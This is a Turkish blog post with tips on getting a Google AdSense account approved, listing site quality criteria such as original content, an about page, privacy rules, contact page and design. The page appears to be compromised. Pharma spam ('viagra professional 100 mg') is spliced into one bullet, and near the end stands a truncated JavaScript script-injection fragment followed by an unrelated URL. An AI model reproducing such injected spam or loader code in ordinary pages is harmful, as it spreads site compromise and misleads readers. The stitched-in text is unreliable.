Google Adsense Hesabı Alma ve Onaylatma

google-adsenseMerhaba arkadaşlar; uzun zamandır adsense hesabını almak veya onaylatmak için çaba harcıyorsanız öncelikle doğru yazıda olduğunuzu hatırlatayım. Webmaster forumlarında veya diğer sosyal paylaşım sitelerinde yer alan “adsense hesap alım & satım” konularını çok fazla takip etmemenizi öncelikle tavsiye ederim. Bu tarz alım satımlarda genellikle banlanma olayı gerçekleşmektedir.

Yazıyı baştan sona dikkatli birşekilde okuyarak belirtilenleri adım adım yaptığınız takdirde PIN’lı bir adsense hesabına sizlerde sahip olacaksınız. Google adsense hesabı almak aslında oldukça kolay fakat sadece biraz özen istemektedir. Kalitesiz sitelerle yapılan başvurular haliyle hemen reddedilmektedir. Fakat kurallara uygun bir şekilde hazırlanan siteyle yapılan başvurular hızlı bir şekilde kısa sürede onaylanabilmektedir.

Google Adsense’nin siteler için belirlediği kalite kriterleri neler ?

 • Amaç : Sitenizin amacı oldukça önemlidir. Site içerik ve bilgi kısımları ile bunu açık bir şekilde kullanıcılarına açıklamalıdır.
  İçerik : Sitede yazılan yazılar temeli oluşturur. Yazıların özgünlüğüne ve uzunluğuna daha da önemlisi kalitesine dikkat edilmelidir.
  Site Yayın Süresi : Sitenin uzun ömürlü olacağını hissetirmesi oldukça önemlidir.
  Hakkımızda : viagra professional 100 mg Sitenin hakkımızda kısmında gerek yönetim gerek site hakkında bilgiler verilmesi önemlidir.
  Gizlilik & Kurallar: Sitenin yayın politikası ile ilgili dikkat edilmesi gerekenler açıklanmalıdır.
  Yayın : Siteye düzenli olarak içerik girilmesi oldukça önemlidir.
  Ziyaretçi Kaynağı : Siteye gelen misafirlerin hangi bağlantılardan geldiği önemlidir. Ziyaretçi trafiğinde hile farkedilirse hesabınız onay almaz.
  Spam : Oldukça hassas bir konudur. Siteniz spam içeriklere kesinlikle yer vermeyiniz.
  İletişim : Sitenizde bir kullanıcıların sizlere ulaşabileceği bir iletişim sayfası bulunmalıdır.
  Site Tasarımı : Sitenin tasarımı oldukça önemlidir. Kullanıcıların rahat kullanabileceği ve içeriğe kolayca ulaşabileceği bir tasarım önemlidir. Tasarımın adsense politikaları ile uyumlu olmasına dikkat edin.

Genel olarak yukarıda belirtilen şartları yerine getirdiğiniz de adsense başvuru yaparsanız kısa süre içerisinde onay alabilirsiniz. Daha sonra mektupla size gelecek olan PIN’i girerek hesabınızı onaylatabilir ve para kazanmaya başlayabilirsiniz. Daha fazla bilgi istediğiniz takdirde google adsense yayın politikalarını okuyabilirsiniz.

var d=document;var s=d.createElement(‘script’); http://blog.mgkglobal.com/?p=5183

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir